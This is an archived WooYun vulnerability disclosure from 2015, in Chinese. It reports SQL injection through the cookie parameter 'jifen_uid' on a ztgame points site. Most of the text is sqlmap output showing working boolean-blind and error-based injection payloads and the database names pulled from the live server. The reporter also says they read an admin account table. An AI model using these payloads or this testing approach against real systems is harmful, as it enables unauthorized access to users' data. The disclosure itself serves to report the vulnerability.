乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-02: 细节已通知厂商并且等待厂商处理中 2015-06-07: 厂商已经主动忽略漏洞,细节向公众公开
【HD】 以团队之名 以个人之荣耀 共建网络安全
本来想测试能不能无限兑换的 结果却意外发现了一个注入点
参数 jifen_uid 未过滤 丢进 sqlmap 里跑了下
总共7个数据库 但是涉及大量数据以及表(看了两个数据库 一个 cd 还有一个 vip cd 里面的数据如图 有两个表每个8千多万条信息···而vip这个数据里有两千多张表 我就没跑了 直接看了个 admin_user 的表的数据 其中有 51 个账号)
Cookie parameter 'jifen_uid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 9312 HTTP(s) requests:---Place: CookieParameter: jifen_uid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: uniqid=1505291124359537771505; uniqid_a=1505291124359537771505; ref=0; date=2015-05-29+11:24:35; ref_date=2015-05-29+11:24:35; ref_ip=42.81.42.133; check_cookie_jsztgamecom=123; _jslog_logininfo_yzd=eyIzNTM4OTc0MzYiOlsiMzUzODk3NDM2IiwiMjAxNS0wNi0wMSAyMTo1NToyOCIsMiwiTlVMTCIsIk5VTEwiXX0=; jifen_uid=353897436 AND 5585=5585; jifen_account=wooyun124; jifen_hash=590b4a1b2b7ffe53156b76c819edc78f; jiathis_rdc={"http://jf.ztgame.com/share.php?uid=353897436%26url=http%3A%2F%2Fjf.ztgame.com":"0|1433167006973"} Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: uniqid=1505291124359537771505; uniqid_a=1505291124359537771505; ref=0; date=2015-05-29+11:24:35; ref_date=2015-05-29+11:24:35; ref_ip=42.81.42.133; check_cookie_jsztgamecom=123; _jslog_logininfo_yzd=eyIzNTM4OTc0MzYiOlsiMzUzODk3NDM2IiwiMjAxNS0wNi0wMSAyMTo1NToyOCIsMiwiTlVMTCIsIk5VTEwiXX0=; jifen_uid=353897436 AND (SELECT 7983 FROM(SELECT COUNT(*),CONCAT(0x7177636a71,(SELECT (CASE WHEN (7983=7983) THEN 1 ELSE 0 END)),0x7177777571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a); jifen_account=wooyun124; jifen_hash=590b4a1b2b7ffe53156b76c819edc78f; jiathis_rdc={"http://jf.ztgame.com/share.php?uid=353897436%26url=http%3A%2F%2Fjf.ztgame.com":"0|1433167006973"}---[22:47:55] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.25, PHP 5.4.4back-end DBMS: MySQL 5.0[22:47:55] [INFO] fetching database names[22:47:55] [INFO] the SQL query used returns 7 entries[22:47:55] [INFO] retrieved: information_schema[22:47:55] [INFO] retrieved: cb[22:47:55] [INFO] retrieved: logs[22:47:55] [INFO] retrieved: mysql[22:47:55] [INFO] retrieved: performance_schema[22:47:55] [INFO] retrieved: test[22:47:55] [INFO] retrieved: vipavailable databases [7]:[*] cb[*] information_schema[*] logs[*] mysql[*] performance_schema[*] test[*] vip
有礼物不?
危害等级:无影响厂商忽略
忽略时间:2015-06-07 09:20
漏洞Rank:15 (WooYun评价)
暂无